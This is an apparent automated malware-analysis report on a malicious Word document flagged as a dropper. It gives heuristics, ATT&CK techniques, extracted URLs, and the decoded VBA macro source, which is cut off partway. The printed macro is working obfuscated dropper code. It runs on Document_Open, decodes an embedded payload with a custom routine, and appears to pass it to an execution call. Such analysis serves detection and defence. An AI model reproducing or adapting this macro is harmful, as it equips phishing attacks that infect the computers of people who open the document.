MALICIOUS
Risk Score: 122
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample is a Microsoft Office document containing a VBA macro that is triggered by the Document_Open event. The macro appears to be designed to download and execute a second-stage payload from a remote URL. The ClamAV detection 'Doc.Dropper.Agent-6409921-0' further supports its malicious nature. The embedded URL is suspicious and likely serves as the initial point of contact for the payload.
Heuristics (4)
- ClamAV: Doc.Dropper.Agent-6409921-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6409921-0
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): Document contains VBA macro code
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://www.eastoftheweb.com/short-stories/UBooks/JereMagi942.shtml (In document text, OLE body)
  - http://ns.adobe.com/xap/1.0/ (In document text, OLE body)
  - http://www.w3.org/1999/02/22-rdf-syntax-ns# (In document text, OLE body)
  - http://ns.adobe.com/xap/1.0/mm/ (In document text, OLE body)
  - http://ns.adobe.com/xap/1.0/sType/ResourceRef# (In document text, OLE body)
  - http://schemas.openxmlformats.org/drawingml/2006/main (In document text, OLE body)
  - http://schemas.openxmlformats.org/officeDocument/2006/bibliography (In document text, OLE body)
  - http://schemas.openxmlformats.org/officeDocument/2006/customXml (In document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7989 bytes |

SHA-256: f5795943ed624beac2a75cb0cd6ffd01cf5caa3a7bdda1ec08975701c89d59af

Preview script (first 1,000 lines of the extracted script):
```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
    Dim europeanization As Variant
    Dim faenum As Variant
    achromatous
    alarmingly = 25 + 15
    Pmt 0, alarmingly, 5329, 47642, 8
End Sub
Sub achromatous()
    unwelcome.rapt.Value = Day(#12/5/2013#)
    Set aorist = unwelcome.rapt.SelectedItem
    neoplasia = 43 + 7
    Pmt 0, neoplasia, 24744, 31974, 5
    mountains = aorist.Name
    meteorologist = 92 - 58 + 7810
    locofoco = Right(mountains, meteorologist)
    victimize = enceliopsis(locofoco)
    intolerable = 20 + 18
    Pmt 0, intolerable, 32628, 11229, 5
    #If (8 * 2 + 5) > (7 - 2 * 1) And (21 - 7 * 3) * 2 < (Win64) Then
    Dim biliary As LongPtr
    Dim atole As LongPtr
    Dim quicksands As LongPtr
    Dim novice As LongPtr
    Authorsr = 69 - 25 + 2020
    #End If
    #If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then
    Dim atole As Long
    Dim biliary As Long
    Dim quicksands As Long
    toimeme = 11 - 17 + 787
    Dim novice As Long
    Authorsr = toimeme + 3459
    #End If
    psychology = 60 + 33
    Pmt 0, psychology, 31062, 23258, 6
    shikar = 51 + 15
    Pmt 0, shikar, 19616, 32862, 2
    cestum = victimize
    biliary = mildran.eyelid(cestum)
    Dim existentialist As Byte
    Dim rooted As Long
    quicksands = 36 - 18 - 18
    atole = biliary + Authorsr
    novice = 3 - 10 + 201534
    alea = clarinetist(novice, _
        quicksands, _
        atole, quicksands, _
        quicksands, quicksands, quicksands)
    inequitably = 20 + 20
    Pmt 0, inequitably, 32517, 23183, 5
End Sub
Function enceliopsis(unmodulated) As String
    Dim ratione As Long
    montevideo = Math.Round(284)
    homogeneously = "flanking"
    Dim metabolite(63) As Long
    Dim commutative As Long
    Dim corrival(63) As Long
    Dim disprove(63) As Long
    Dim nauseate As Long
    Dim hoarder() As Byte
    Dim farkleberry As Long
    Dim e(6962) As Byte
    advisee = 45 - 121 + 332
    mb = 122 - 97 + 230
    eagle = 124 - 25 - 35
    Dim cowper As Integer
    department = 27 - 94 + 65347
    gravel = 76 - 2 + 262070
    chattel = 100 - 5 + 16711585
    ivory = 126 - 90 + 65500
    detractory = 37 - 97 + 4156
    Dim montanan As String
    materialize = 96 - 41 - 55
    cancellated = 12 - 99 + 7930
    Dim oscine() As Byte
    Dim beamends As String
    Dim malva As Integer
    oscine = VBA.StrConv(unmodulated, 128)
    Dim unambitious As Long
    tanglebush = 37 + 21
    Pmt 0, tanglebush, 4973, 55252, 5
    lightfooted = 7840 + 3
    CloseUp = vbKeyShift - 12
    For hormone = (3 - 3) To lightfooted
        If hormone Mod 2 = (4 - 4) Then
            oscine(hormone) = oscine(hormone) - CloseUp
        Else
            oscine(hormone) = oscine(hormone) - (CloseUp - 1)
        End If
    Next hormone
    surface = 30 + 3
    Pmt 0, surface, 9375, 44249, 7
    kappa = zambia
    For nauseate = (16 - 8 * 2) * 1 To (80 / 2 + 23) * (7 - 6)
        disprove(nauseate) = atopognosia(nauseate, eagle, 66)
        corrival(nauseate) = atopognosia(nauseate, detractory, 66)
        metabolite(nauseate) = atopognosia(nauseate, gravel, 66)
    Next nauseate
    grievously = 49 + 50
    Pmt 0, grievously, 18764, 37821, 8
    hoarder = oscine
    apollyon = 19 + 36
    Pmt 0, apollyon, 26387, 26777, 5
    hardearned = 24 - 110 + 89
    adenoidal = Fix(416)
    montevideo = Rnd(198)
    multiply = hardearned + 1
    hourglass = 6 - 61 + 57
    For commutative = (5 - 5) To lightfooted
        galop = hoarder(commutative)
        compositor = hoarder(commutative + 2)
        pharmacological = corrival(kappa(hoarder(commutative + 1)))
        issus = disprove(kappa(compositor)) + kappa(hoarder(commutative + hardearned))
        ratione = metabolite(kappa(galop)) + pharmacological + issus
        nauseate = atopognosia(ratione, chattel, 58)
        e(farkleberry) = atopognosia(nauseate, ivory, 48)
        nauseate = atopognosia(ratione, department, 58)
        e(farkleberry + 1) = atopognosia(nauseate, advisee, 48)
        e(farkleberry + hourglass) = atopognosia(ratione, mb, 58)
        farkleberry = farkleberry + hourglass + 1
        commutative = commutative + 3
    Next
    enceliopsis = e
End Function
Attribute VB_Name = "sideboard"
' Es ist kalt und regungslos
#If (13 * 3 + 5) ... (truncated)
```